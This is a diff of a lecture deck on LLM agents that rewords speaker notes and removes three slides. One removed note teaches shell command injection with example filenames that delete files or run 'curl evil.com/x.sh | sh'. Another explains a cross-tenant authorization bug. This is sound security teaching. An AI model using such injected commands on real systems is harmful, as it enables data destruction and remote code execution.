--- a/lectures/Lecture 10.1 - Agents.pptx
+++ b/lectures/Lecture 10.1 - Agents.pptx
@@ -9,9 +9,6 @@
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
-    <p:sldId id="257" r:id="rId3"/>
-    <p:sldId id="258" r:id="rId4"/>
-    <p:sldId id="259" r:id="rId5"/>
     <p:sldId id="260" r:id="rId6"/>
     <p:sldId id="261" r:id="rId7"/>
     <p:sldId id="262" r:id="rId8"/>
@@ -870,7 +867,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Last technical lecture of the semester. The thesis deliberately echoes the 8.1 swap: the magic isn't magic, it's a loop you can write in about 30 lines. By the end of class students should be able to open a Claude Code transcript and tell you exactly what the loop is doing on each turn, which is honestly a useful skill for the last two weeks of project work.</a:t>
+              <a:t>Last technical lecture of the semester. The thesis deliberately echoes the 8.1 move - the whole thing comes apart into a loop you can write in about 30 lines, and there's nothing else in the box. By the end of class students should be able to open a Claude Code transcript and tell you exactly what the loop is doing on each turn, which is honestly a useful skill for the last two weeks of project work.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -1028,7 +1025,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Big callback to 3.1 / 5.2 here. Students have made plenty of HTTP requests by now, so the LLM API isn't some separate category of thing, it's just one more JSON endpoint. What's different is only what runs server-side - not your code, not a database query, but a model that produces text. From the client's side it's completely indistinguishable from any other API. Worth hammering, because the easy mistake is to treat the agent as a magical category instead of 'an HTTP client calling one particular endpoint over and over.'</a:t>
+              <a:t>Big callback to 3.1 / 5.2 here. Students have made plenty of HTTP requests by now, so the LLM API isn't some separate category of thing, it's just one more JSON endpoint. The only thing that's different is what's running on the far side, which is a model producing text instead of your code or a database query. From the client's side it's completely indistinguishable from any other API. Worth hammering, because the easy mistake is to treat the agent as a magical category instead of 'an HTTP client calling one particular endpoint over and over.'</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -1186,7 +1183,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Big callback to 3.1 / 5.2 here. Students have made plenty of HTTP requests by now, so the LLM API isn't some separate category of thing, it's just one more JSON endpoint. What's different is only what runs server-side - not your code, not a database query, but a model that produces text. From the client's side it's completely indistinguishable from any other API. Worth hammering, because the easy mistake is to treat the agent as a magical category instead of 'an HTTP client calling one particular endpoint over and over.'</a:t>
+              <a:t>Big callback to 3.1 / 5.2 here. Students have made plenty of HTTP requests by now, so the LLM API isn't some separate category of thing, it's just one more JSON endpoint. The only thing that's different is what's running on the far side, which is a model producing text instead of your code or a database query. From the client's side it's completely indistinguishable from any other API. Worth hammering, because the easy mistake is to treat the agent as a magical category instead of 'an HTTP client calling one particular endpoint over and over.'</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -2024,7 +2021,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>. If you printed `messages` at the end of every turn you'd watch it grow by two entries each time around - the user's input and the model's reply. The server never sees state, ever. The client is the one holding it, and the client is you.</a:t>
+              <a:t>. If you printed `messages` at the end of every turn you'd watch it grow by two entries each time around - the user's input and the model's reply. The server never sees state at all, ever - the client is holding every bit of it, and the client is you.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -2190,7 +2187,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>. If you printed `messages` at the end of every turn you'd watch it grow by two entries each time around - the user's input and the model's reply. The server never sees state, ever. The client is the one holding it, and the client is you.</a:t>
+              <a:t>. If you printed `messages` at the end of every turn you'd watch it grow by two entries each time around - the user's input and the model's reply. The server never sees state at all, ever - the client is holding every bit of it, and the client is you.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -2356,7 +2353,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>. If you printed `messages` at the end of every turn you'd watch it grow by two entries each time around - the user's input and the model's reply. The server never sees state, ever. The client is the one holding it, and the client is you.</a:t>
+              <a:t>. If you printed `messages` at the end of every turn you'd watch it grow by two entries each time around - the user's input and the model's reply. The server never sees state at all, ever - the client is holding every bit of it, and the client is you.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -2570,272 +2567,6 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 89"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="90" name="Google Shape;90;g3ec891ba402_1_246:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="91" name="Google Shape;91;g3ec891ba402_1_246:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># It's just a filename going into a command. What's the worst</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># an attacker can put in that filename?</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Give them a minute. The filename is concatenated straight into a string handed to </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>os.system</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>, which runs it through the shell. The shell interprets semicolons, pipes, backticks, dollar-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>parens</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> - all of it. An attacker uploads a file (or just sends a filename) of `</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>cat.png</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>; rm -rf /</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>tmp</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/* #` and the shell happily runs the convert command AND the rm. Or `</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>cat.png</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>; curl </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>evil.com</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>x.sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> | </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> #` to download and execute a payload - that's full remote code execution on your server. The mistake is identical to SQL injection: untrusted text became part of a structured thing (a shell command) the system parses. Don't reveal the fix yet - next two slides give one more example, then the rule.</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="92" name="Google Shape;92;g3ec891ba402_1_246:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
 <file path=ppt/notesSlides/notesSlide20.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
@@ -2938,7 +2669,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The cost is real and worth naming: long conversations get expensive because every turn re-bills you for every token that came before. That's part of why prompt caching exists - the API can cache the prefix of your messages list across calls, so re-sending a long history doesn't re-charge you for the full prefix every time. Don't go deep on caching here, just name it as the obvious lever and move on. The thing to leave them with is the upside: statelessness means your code is the source of truth for the conversation, which is what lets you edit, branch, persist at all. None of that would be possible if state lived on the server.</a:t>
+              <a:t>The cost is real and worth naming: long conversations get expensive because every turn re-bills you for every token that came before. That's part of why prompt caching exists - the API can cache the prefix of your messages list across calls, so re-sending a long history doesn't re-charge you for the full prefix every time. Don't go deep on caching here, just name it as the obvious lever and move on. Leave them with the upside though - statelessness means your code is the source of truth for the conversation, which is the only reason you can edit it, branch it, or persist it at all. None of that works if the state lives on the server.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -3096,7 +2827,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The cost is real and worth naming: long conversations get expensive because every turn re-bills you for every token that came before. That's part of why prompt caching exists - the API can cache the prefix of your messages list across calls, so re-sending a long history doesn't re-charge you for the full prefix every time. Don't go deep on caching here, just name it as the obvious lever and move on. The thing to leave them with is the upside: statelessness means your code is the source of truth for the conversation, which is what lets you edit, branch, persist at all. None of that would be possible if state lived on the server.</a:t>
+              <a:t>The cost is real and worth naming: long conversations get expensive because every turn re-bills you for every token that came before. That's part of why prompt caching exists - the API can cache the prefix of your messages list across calls, so re-sending a long history doesn't re-charge you for the full prefix every time. Don't go deep on caching here, just name it as the obvious lever and move on. Leave them with the upside though - statelessness means your code is the source of truth for the conversation, which is the only reason you can edit it, branch it, or persist it at all. None of that works if the state lives on the server.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -3254,7 +2985,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The cost is real and worth naming: long conversations get expensive because every turn re-bills you for every token that came before. That's part of why prompt caching exists - the API can cache the prefix of your messages list across calls, so re-sending a long history doesn't re-charge you for the full prefix every time. Don't go deep on caching here, just name it as the obvious lever and move on. The thing to leave them with is the upside: statelessness means your code is the source of truth for the conversation, which is what lets you edit, branch, persist at all. None of that would be possible if state lived on the server.</a:t>
+              <a:t>The cost is real and worth naming: long conversations get expensive because every turn re-bills you for every token that came before. That's part of why prompt caching exists - the API can cache the prefix of your messages list across calls, so re-sending a long history doesn't re-charge you for the full prefix every time. Don't go deep on caching here, just name it as the obvious lever and move on. Leave them with the upside though - statelessness means your code is the source of truth for the conversation, which is the only reason you can edit it, branch it, or persist it at all. None of that works if the state lives on the server.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -4448,216 +4179,6 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 98"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="99" name="Google Shape;99;g3ec891ba402_1_329:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="100" name="Google Shape;100;g3ec891ba402_1_329:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># The membership check passes only for orgs you belong to.</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t># So this is locked down, right?</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>This is the subtle one and it's a real, common, dangerous bug - cross-tenant data leak. The authorization check is present AND correct: it verifies you're a member of </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>org_id</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>. The bug is that it authorizes the CONTAINER (the org) but the action touches the ITEM (the invoice), and nothing ties the invoice back to the org. So a member of org 5 (which they legitimately belong to) requests /orgs/5/invoices/9999 where invoice 9999 belongs to org 200. Membership check passes - they really are in org 5. Invoice fetch ignores the org entirely. They just read another company's invoice. This is how multi-tenant SaaS apps leak across customers, and it's a favorite of bug-bounty hunters. The lesson: authorize the thing you're actually touching, not its parent.</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="101" name="Google Shape;101;g3ec891ba402_1_329:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldNum" idx="12"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
 <file path=ppt/notesSlides/notesSlide30.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
@@ -5528,7 +5049,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The framing to hammer: tools aren't 'how the model does things,' tools are 'what you've authorized to happen on the model's behalf.' That's a security framing, not a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt isn't friction, it's the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
+              <a:t>The framing to hammer is that tools are what you've authorized to happen on the model's behalf, which makes this a security question a lot more than a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt is the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -5686,7 +5207,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The framing to hammer: tools aren't 'how the model does things,' tools are 'what you've authorized to happen on the model's behalf.' That's a security framing, not a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt isn't friction, it's the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
+              <a:t>The framing to hammer is that tools are what you've authorized to happen on the model's behalf, which makes this a security question a lot more than a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt is the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -5844,7 +5365,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The framing to hammer: tools aren't 'how the model does things,' tools are 'what you've authorized to happen on the model's behalf.' That's a security framing, not a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt isn't friction, it's the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
+              <a:t>The framing to hammer is that tools are what you've authorized to happen on the model's behalf, which makes this a security question a lot more than a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt is the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -6002,7 +5523,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The framing to hammer: tools aren't 'how the model does things,' tools are 'what you've authorized to happen on the model's behalf.' That's a security framing, not a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt isn't friction, it's the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
+              <a:t>The framing to hammer is that tools are what you've authorized to happen on the model's behalf, which makes this a security question a lot more than a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt is the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -6160,7 +5681,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>The framing to hammer: tools aren't 'how the model does things,' tools are 'what you've authorized to happen on the model's behalf.' That's a security framing, not a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt isn't friction, it's the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
+              <a:t>The framing to hammer is that tools are what you've authorized to happen on the model's behalf, which makes this a security question a lot more than a capability one. The Claude Code analogy is worth drawing out - it has tools like read, write, bash, but it ALSO has a permission system that asks the user before it runs the destructive ones. That permission prompt is the design choice that makes a really powerful tool safe to hand to people. For the final project, anyone wiring an agent into their app should think hard about what tools they're exposing and what the worst case actually looks like.</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -6374,248 +5895,6 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 107"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="108" name="Google Shape;108;g3ec891ba402_1_337:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="3000000" cy="3000000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
